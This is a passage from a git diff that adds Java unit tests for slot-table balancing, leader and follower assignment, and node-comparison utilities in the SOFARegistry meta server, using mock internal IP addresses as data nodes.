+ System.setProperty(NaiveBalancePolicy.PROP_LEADER_MAX_MOVE, SlotConfig.SLOT_NUM + ""); + ScheduledSlotArranger arranger = + new ScheduledSlotArranger(dataServerManager, slotManager, slotTableMonitor, leaderElector); + arranger.getLifecycleState().setPhase(LifecycleState.LifecyclePhase.STARTED); + + List dataNodes = Lists.newArrayList(new DataNode(new URL("100.88.142.32"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + makeMetaLeader(); + arranger.arrangeSync(); + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + + dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + arranger.arrangeSync(); + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + + loopArrange(arranger); + + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + Assert.assertTrue( + isSlotTableLeaderBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + + Thread.sleep(2); + dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc()), + new DataNode(new URL("100.88.142.19"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + loopArrange(arranger); + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + + Thread.sleep(2); + dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc()), + new DataNode(new URL("100.88.142.19"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + loopArrange(arranger); + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + Assert.assertTrue( + isSlotTableLeaderBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + + Thread.sleep(2); + dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + loopArrange(arranger); + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + Assert.assertTrue( + isSlotTableLeaderBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + + Thread.sleep(2); + dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc()), + new DataNode(new URL("100.88.142.19"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + loopArrange(arranger); + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + + Thread.sleep(2); + dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc()), + new DataNode(new URL("100.88.142.19"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + loopArrange(arranger); + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + Assert.assertTrue( + isSlotTableBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + Assert.assertTrue( + isSlotTableLeaderBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + } + + @Test + public void testDataLeaderBalance() throws Exception { + ScheduledSlotArranger arranger = + new ScheduledSlotArranger(dataServerManager, slotManager, slotTableMonitor, leaderElector); + arranger.getLifecycleState().setPhase(LifecycleState.LifecyclePhase.STARTED); + + byte[] bytes = + FileUtils.readFileToByteArray(new File("src/test/resources/test/slot-table.json")); + SlotTable prevSlotTable = + JsonUtils.getJacksonObjectMapper().readValue(bytes, InnerSlotTable.class).toSlotTable(); + slotManager.refresh(prevSlotTable); + List dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc()), + new DataNode(new URL("100.88.142.19"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + makeMetaLeader(); + + loopArrange(arranger); + + logger.info( + JsonUtils.getJacksonObjectMapper() + .writerWithDefaultPrettyPrinter() + .writeValueAsString(slotManager.getSlotTable())); + Assert.assertTrue( + isSlotTableLeaderBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + } + + @Test + public void testDataLeaderBalance2() throws Exception { + ScheduledSlotArranger arranger = + new ScheduledSlotArranger(dataServerManager, slotManager, slotTableMonitor, leaderElector); + arranger.getLifecycleState().setPhase(LifecycleState.LifecyclePhase.STARTED); + byte[] bytes = + FileUtils.readFileToByteArray(new File("src/test/resources/test/slot-table-2.json")); + SlotTable prevSlotTable = + JsonUtils.getJacksonObjectMapper().readValue(bytes, InnerSlotTable.class).toSlotTable(); + slotManager.refresh(prevSlotTable); + List dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.83.52.136"), getDc()), + new DataNode(new URL("100.88.50.178"), getDc()), + new DataNode(new URL("11.166.229.74"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + makeMetaLeader(); + + loopArrange(arranger); + + Assert.assertTrue( + isSlotTableLeaderBalanced( + slotManager.getSlotTable(), + dataServerManager.getDataServerMetaInfo().getClusterMembers())); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + } + + @Test + public void testNoInfinityLoop() throws Exception { + ScheduledSlotArranger assigner = + new ScheduledSlotArranger(dataServerManager, slotManager, slotTableMonitor, leaderElector); + assigner.getLifecycleState().setPhase(LifecycleState.LifecyclePhase.STARTED); + + byte[] bytes = + FileUtils.readFileToByteArray(new File("src/test/resources/test/slot-table.json")); + SlotTable prevSlotTable = + JsonUtils.getJacksonObjectMapper().readValue(bytes, InnerSlotTable.class).toSlotTable(); + slotManager.refresh(prevSlotTable); + List dataNodes = + Lists.newArrayList( + new DataNode(new URL("100.88.142.32"), getDc()), + new DataNode(new URL("100.88.142.36"), getDc()), + new DataNode(new URL("100.88.142.19"), getDc())); + when(dataServerManager.getDataServerMetaInfo()) + .thenReturn(new VersionedList<>(DatumVersionUtil.nextId(), dataNodes)); + makeMetaLeader(); + + loopArrange(assigner); + assertSlotTableNoDupLeaderFollower(slotManager.getSlotTable()); + } + + public static class InnerSlotTable { + private long epoch; + private List slots; + private List dataServers; + + @JsonCreator(mode = JsonCreator.Mode.PROPERTIES) + public InnerSlotTable( + @JsonProperty("id") long epoch, + @JsonProperty("slots") List slots, + @JsonProperty("dataServers") List dataServers) { + this.epoch = epoch; + this.slots = slots; + this.dataServers = dataServers; + } + + public long getEpoch() { + return epoch; + } + + public List getSlots() { + return slots; + } + + public List getDataServers() { + return dataServers; + } + + public SlotTable toSlotTable() { + Map slotMap = Maps.newHashMap(); + slots.forEach(slot -> slotMap.put(slot.getId(), slot)); + return new SlotTable(epoch, slotMap.values()); + } + } + + private SlotTableBuilder createSlotTableBuilder(List currentDataNodeIps) { + SlotTable slotTable = slotManager.getSlotTable(); + com.alipay.sofa.registry.server.shared.comparator.NodeComparator comparator = + new com.alipay.sofa.registry.server.shared.comparator.NodeComparator( + slotTable.getDataServers(), currentDataNodeIps); + SlotTableBuilder slotTableBuilder = + new SlotTableBuilder( + slotTable, slotManager.getSlotNums(), slotManager.getSlotReplicaNums()); + + slotTableBuilder.init(currentDataNodeIps); + + comparator.getRemoved().forEach(slotTableBuilder::removeDataServerSlots); + return slotTableBuilder; + } + + private void loopArrange(ScheduledSlotArranger arranger) { + for (int i = 0; i < 100; i++) { + arranger.arrangeSync(); + } + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/ListUtil.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/ListUtil.java new file mode 100644 index 000000000..29fe8c006 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/ListUtil.java @@ -0,0 +1,59 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util; + +import static java.util.stream.Collectors.toList; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import java.util.Collections; +import java.util.List; + +/** + * @author xiaojian.xj + * @version $Id: ListUtil.java, v 0.1 2021年02月02日 21:02 xiaojian.xj Exp $ + */ +public class ListUtil { + + /** + * 取差集 + * + * @param list1 + * @param list2 + * @return + */ + public static List reduce(List list1, List list2) { + List reduce = list1.stream().filter(item -> !list2.contains(item)).collect(toList()); + + return reduce; + } + + /** + * random pick + * + * @param list + * @param count + * @return + */ + public static List randomPick(List list, int count) { + if (list.size() <= count) { + return list; + } + + Collections.shuffle(list); + return list.subList(0, count); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/MigrateSlotGroupTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/MigrateSlotGroupTest.java new file mode 100644 index 000000000..da876363d --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/MigrateSlotGroupTest.java @@ -0,0 +1,88 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util; + +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.slot.assigner.ScoreStrategy; +import com.alipay.sofa.registry.server.meta.slot.util.comparator.SortType; +import com.google.common.collect.ImmutableMap; +import com.google.common.collect.Lists; +import com.google.common.collect.Sets; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; + +public class MigrateSlotGroupTest extends AbstractMetaServerTestBase { + + private MigrateSlotGroup migrateSlotGroup = new MigrateSlotGroup(); + + @Test + public void testAddLeader() { + migrateSlotGroup.addLeader(1); + migrateSlotGroup.addLeader(2); + Assert.assertEquals(Sets.newHashSet(1, 2), migrateSlotGroup.getLeaders()); + } + + @Test + public void testAddFollower() { + migrateSlotGroup.addFollower(1); + migrateSlotGroup.addFollower(2); + Assert.assertEquals(ImmutableMap.of(1, 1, 2, 1), migrateSlotGroup.getLackFollowers()); + } + + @Test + public void testTestAddFollower() { + migrateSlotGroup.addFollower(1, 2); + migrateSlotGroup.addFollower(2, 3); + Assert.assertEquals(ImmutableMap.of(1, 2, 2, 3), migrateSlotGroup.getLackFollowers()); + logger.info("[migrate slot group] {}", migrateSlotGroup.toString()); + } + + @Test + public void testGetLeadersByScore() { + migrateSlotGroup.addLeader(1).addLeader(2).addLeader(3).addLeader(4).addLeader(5); + List result = + migrateSlotGroup.getLeadersByScore( + new ScoreStrategy() { + @Override + public int score(Integer slotId) { + return SortType.DES.getScore(slotId); + } + }); + Assert.assertEquals(Lists.newArrayList(5, 4, 3, 2, 1), result); + } + + @Test + public void testGetFollowersByScore() { + migrateSlotGroup.addFollower(1, 2).addFollower(2, 3).addFollower(3, 4).addFollower(4, 5); + List result = + migrateSlotGroup.getFollowersByScore( + new ScoreStrategy() { + @Override + public int score(MigrateSlotGroup.FollowerToAssign followerToAssign) { + return SortType.ASC.getScore(followerToAssign.getAssigneeNums()); + } + }); + Assert.assertEquals( + Lists.newArrayList( + new MigrateSlotGroup.FollowerToAssign(1, 2), + new MigrateSlotGroup.FollowerToAssign(2, 3), + new MigrateSlotGroup.FollowerToAssign(3, 4), + new MigrateSlotGroup.FollowerToAssign(4, 5)), + result); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/NodeComparatorTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/NodeComparatorTest.java new file mode 100644 index 000000000..120f8578f --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/NodeComparatorTest.java @@ -0,0 +1,42 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util; + +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.shared.util.NodeUtils; +import java.util.HashSet; +import java.util.List; +import org.assertj.core.util.Lists; +import org.junit.Assert; +import org.junit.Test; + +public class NodeComparatorTest extends AbstractMetaServerTestBase { + + @Test + public void testCompare() { + List prev = NodeUtils.transferNodeToIpList(randomDataNodes(6)); + List current = Lists.newArrayList(prev); + List added = NodeUtils.transferNodeToIpList(randomDataNodes(2)); + current.addAll(added); + List removed = prev.subList(0, 3); + current.removeAll(removed); + com.alipay.sofa.registry.server.shared.comparator.NodeComparator comparator = + new com.alipay.sofa.registry.server.shared.comparator.NodeComparator(prev, current); + Assert.assertEquals(new HashSet<>(added), comparator.getAdded()); + Assert.assertEquals(new HashSet<>(removed), comparator.getRemoved()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/SlotBuilderTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/SlotBuilderTest.java new file mode 100644 index 000000000..49e836aeb --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/SlotBuilderTest.java @@ -0,0 +1,104 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util; + +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.exception.SofaRegistryRuntimeException; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotBuilder; +import org.junit.Assert; +import org.junit.Before; +import org.junit.Test; + +/** + * @author chen.zhu + *

Jan 15, 2021 + */ +public class SlotBuilderTest extends AbstractMetaServerTestBase { + + private SlotBuilder slotBuilder; + + @Before + public void beforeSlotBuilderTest() { + slotBuilder = new SlotBuilder(1, 1); + } + + @Test + public void testSetLeader() { + slotBuilder = new SlotBuilder(1, 1, "10.0.0.1", 100); + slotBuilder.setLeader("10.0.0.2"); + Assert.assertEquals("10.0.0.2", slotBuilder.getLeader()); + Assert.assertEquals(1, slotBuilder.getSlotId()); + } + + @Test + public void testForceSetLeader() { + slotBuilder = new SlotBuilder(1, 1, "10.0.0.1", 100); + long epoch = slotBuilder.getEpoch(); + slotBuilder.setLeader("10.0.0.2"); + Assert.assertEquals("10.0.0.2", slotBuilder.getLeader()); + Assert.assertNotEquals(epoch, slotBuilder.getEpoch()); + Assert.assertEquals(1, slotBuilder.getSlotId()); + } + + @Test + public void testAddFollower() { + slotBuilder = new SlotBuilder(1, 1, "10.0.0.1", 100); + long epoch = slotBuilder.getEpoch(); + slotBuilder.addFollower("10.0.0.2"); + Assert.assertEquals(epoch, slotBuilder.getEpoch()); + Assert.assertTrue(slotBuilder.getFollowers().contains("10.0.0.2")); + try { + slotBuilder.addFollower("10.0.0.3"); + } catch (Exception e) { + e.printStackTrace(); + } + Assert.assertEquals(epoch, slotBuilder.getEpoch()); + Assert.assertFalse(slotBuilder.getFollowers().contains("10.0.0.3")); + } + + @Test + public void testRemoveFollower() { + slotBuilder = new SlotBuilder(1, 1, "10.0.0.1", 100); + long epoch = slotBuilder.getEpoch(); + slotBuilder.addFollower("10.0.0.2"); + Assert.assertEquals(epoch, slotBuilder.getEpoch()); + Assert.assertTrue(slotBuilder.getFollowers().contains("10.0.0.2")); + + slotBuilder.removeFollower("10.0.0.2"); + slotBuilder.addFollower("10.0.0.3"); + Assert.assertEquals(epoch, slotBuilder.getEpoch()); + Assert.assertTrue(slotBuilder.getFollowers().contains("10.0.0.3")); + } + + @Test(expected = SofaRegistryRuntimeException.class) + public void testBuild() { + slotBuilder = new SlotBuilder(1, 1, "10.0.0.1", 100); + slotBuilder.setLeader(null); + slotBuilder.build(); + } + + @Test + public void testBuildNormal() { + slotBuilder = new SlotBuilder(1, 1, "10.0.0.1", 100); + slotBuilder.setLeader("20.0.0.2"); + Slot slot = slotBuilder.build(); + Assert.assertEquals("20.0.0.2", slot.getLeader()); + logger.info("[slot-builder] {}", slotBuilder.toString()); + logger.info("[slot] {}", slot.toString()); + } +} diff --git a/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/SlotTableBuilderTest.java b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/SlotTableBuilderTest.java new file mode 100644 index 000000000..591e12014 --- /dev/null +++ b/server/server/meta/src/test/java/com/alipay/sofa/registry/server/meta/slot/util/SlotTableBuilderTest.java @@ -0,0 +1,295 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.slot.util; + +import static org.junit.Assert.assertSame; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.DataNode; +import com.alipay.sofa.registry.common.model.slot.DataNodeSlot; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.server.meta.AbstractMetaServerTestBase; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotBuilder; +import com.alipay.sofa.registry.server.meta.slot.util.builder.SlotTableBuilder; +import com.alipay.sofa.registry.server.shared.util.NodeUtils; +import com.google.common.collect.Lists; +import java.util.ArrayList; +import java.util.Comparator; +import java.util.List; +import org.junit.Assert; +import org.junit.Test; + +/** + * @author chen.zhu + *

Jan 15, 2021 + */ +public class SlotTableBuilderTest extends AbstractMetaServerTestBase { + + @Test + public void testGetOrCreate() throws InterruptedException { + int slotId = random.nextInt(16); + int tasks = 10; + List result = new ArrayList<>(tasks); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(null, 16, 2); + for (int i = 0; i < tasks; i++) { + result.add(i, slotTableBuilder.getOrCreate(slotId)); + } + SlotBuilder sample = slotTableBuilder.getOrCreate(slotId); + for (SlotBuilder sb : result) { + assertSame(sb, sample); + } + } + + @Test + public void testInit() { + List dataNodes = randomDataNodes(6); + SlotTable slotTable = randomSlotTable(dataNodes); + DataNode alternative = new DataNode(randomURL(randomIp()), getDc()); + dataNodes.add(alternative); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 16, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + Assert.assertNotNull(slotTableBuilder.getDataNodeSlot(alternative.getIp())); + + for (int slotId = 0; slotId < slotTable.getSlots().size(); slotId++) { + Assert.assertEquals( + slotTableBuilder.getOrCreate(slotId).getLeader(), slotTable.getSlot(slotId).getLeader()); + Assert.assertEquals( + slotTableBuilder.getOrCreate(slotId).getEpoch(), + slotTable.getSlot(slotId).getLeaderEpoch()); + Assert.assertEquals( + slotTableBuilder.getOrCreate(slotId).getFollowers(), + slotTable.getSlot(slotId).getFollowers()); + } + + for (DataNode dataNode : dataNodes) { + List samples = slotTable.transfer(dataNode.getIp(), false); + if (!samples.isEmpty()) { + Assert.assertEquals(samples.get(0), slotTableBuilder.getDataNodeSlot(dataNode.getIp())); + } + } + } + + @Test + public void testSetLeader() { + List dataNodes = randomDataNodes(3); + SlotTable slotTable = randomSlotTable(dataNodes); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 16, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + int slotId = random.nextInt(16); + SlotBuilder sb = slotTableBuilder.getOrCreate(slotId); + String prevLeader = sb.getLeader(); + long prevEpoch = sb.getEpoch(); + String nextLeader = null; + int index = 0; + do { + nextLeader = dataNodes.get(index++).getIp(); + } while (nextLeader.equals(prevLeader)); + logger.info("[prev leader] {}", prevLeader); + logger.info("[next leader] {}", nextLeader); + slotTableBuilder.replaceLeader(slotId, nextLeader); + Assert.assertNotEquals(sb.getLeader(), prevLeader); + logger.info("[followers] {}", sb.getFollowers()); + Assert.assertTrue(sb.getEpoch() > prevEpoch); + + Assert.assertTrue(slotTableBuilder.getDataNodeSlot(nextLeader).getLeaders().contains(slotId)); + } + + @Test + public void testRemoveFollower() { + List dataNodes = randomDataNodes(6); + SlotTable slotTable = randomSlotTable(dataNodes); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 16, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + int slotId = random.nextInt(16); + String follower = slotTable.getSlot(slotId).getFollowers().iterator().next(); + slotTableBuilder.removeFollower(slotId, follower); + Assert.assertFalse(slotTableBuilder.getOrCreate(slotId).getFollowers().contains(follower)); + Assert.assertFalse(slotTableBuilder.getDataNodeSlot(follower).getFollowers().contains(slotId)); + } + + @Test + public void testAddFollower() { + List dataNodes = randomDataNodes(6); + SlotTable slotTable = randomSlotTable(dataNodes); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 16, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + int slotId = random.nextInt(16); + SlotBuilder sb = slotTableBuilder.getOrCreate(slotId); + String prevFollower = sb.getFollowers().iterator().next(); + + long prevEpoch = sb.getEpoch(); + String nextFollower = prevFollower; + int index = 0; + do { + nextFollower = dataNodes.get(index++).getIp(); + } while (nextFollower.equals(prevFollower) || nextFollower.equals(sb.getLeader())); + + try { + slotTableBuilder.addFollower(slotId, nextFollower); + Assert.assertTrue("could not reach", false); + } catch (IllegalArgumentException e) { + Assert.assertTrue(e.getMessage().contains("to many")); + } + Assert.assertFalse(slotTableBuilder.getOrCreate(slotId).getFollowers().contains(nextFollower)); + Assert.assertFalse( + slotTableBuilder.getDataNodeSlot(nextFollower).getFollowers().contains(slotId)); + + sb.removeFollower(prevFollower); + slotTableBuilder.addFollower(slotId, nextFollower); + Assert.assertTrue(slotTableBuilder.getOrCreate(slotId).getFollowers().contains(nextFollower)); + Assert.assertTrue( + slotTableBuilder.getDataNodeSlot(nextFollower).getFollowers().contains(slotId)); + } + + @Test + public void testHasNoAssignedSlots() { + List dataNodes = randomDataNodes(6); + SlotTable slotTable = randomSlotTable(dataNodes); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 16, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + Assert.assertFalse(slotTableBuilder.hasNoAssignedSlots()); + + slotTableBuilder = new SlotTableBuilder(null, 16, 2); + Assert.assertTrue(slotTableBuilder.hasNoAssignedSlots()); + + dataNodes.add(new DataNode(randomURL(randomIp()), getDc())); + slotTableBuilder = new SlotTableBuilder(slotTable, 16, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + Assert.assertFalse(slotTableBuilder.hasNoAssignedSlots()); + } + + @Test + public void testRemoveDataServerSlots() { + List dataNodes = randomDataNodes(6); + SlotTable slotTable = randomSlotTable(dataNodes); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 16, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + Assert.assertFalse(slotTableBuilder.hasNoAssignedSlots()); + + slotTableBuilder.removeDataServerSlots(dataNodes.get(0).getIp()); + Assert.assertTrue(slotTableBuilder.hasNoAssignedSlots()); + + Assert.assertNull(slotTableBuilder.getDataNodeSlotIfPresent(dataNodes.get(0).getIp())); + } + + @Test + public void testGetNoAssignedSlots() { + List dataNodes = randomDataNodes(6); + SlotTable slotTable = randomSlotTable(dataNodes); + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(slotTable, 16, 2); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + Assert.assertFalse(slotTableBuilder.hasNoAssignedSlots()); + DataNodeSlot dataNodeSlot = slotTableBuilder.getDataNodeSlot(dataNodes.get(0).getIp()); + MigrateSlotGroup expected = new MigrateSlotGroup(); + dataNodeSlot.getLeaders().forEach(expected::addLeader); + dataNodeSlot.getFollowers().forEach(expected::addFollower); + + slotTableBuilder.removeDataServerSlots(dataNodes.get(0).getIp()); + Assert.assertTrue(slotTableBuilder.hasNoAssignedSlots()); + + MigrateSlotGroup actual = slotTableBuilder.getNoAssignedSlots(); + Assert.assertEquals(expected, actual); + } + + @Test + public void testGetDataNodeSlotsLeaderBeyond() { + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(null, 6, 2); + List dataNodes = randomDataNodes(3); + String leader = dataNodes.get(0).getIp(); + for (int i = 0; i < 6; i++) { + slotTableBuilder.getOrCreate(i); + slotTableBuilder.replaceLeader(i, leader); + } + Assert.assertEquals( + Lists.newArrayList(slotTableBuilder.getDataNodeSlot(leader)), + slotTableBuilder.getDataNodeSlotsLeaderBeyond(6 / 3)); + } + + @Test + public void testGetDataNodeSlotsLeaderBelow() { + SlotTableBuilder slotTableBuilder = new SlotTableBuilder(null, 6, 2); + List dataNodes = randomDataNodes(3); + slotTableBuilder.init(NodeUtils.transferNodeToIpList(dataNodes)); + String leader = dataNodes.get(0).getIp(); + for (int i = 0; i < 6; i++) { + slotTableBuilder.getOrCreate(i); + slotTableBuilder.replaceLeader(i, leader); + } + List expected = + Lists.newArrayList( + slotTableBuilder.getDataNodeSlot(dataNodes.get(1).getIp()), + slotTableBuilder.getDataNodeSlot(dataNodes.get(2).getIp())); + expected.sort( + new Comparator() { + @Override + public int compare(DataNodeSlot o1, DataNodeSlot 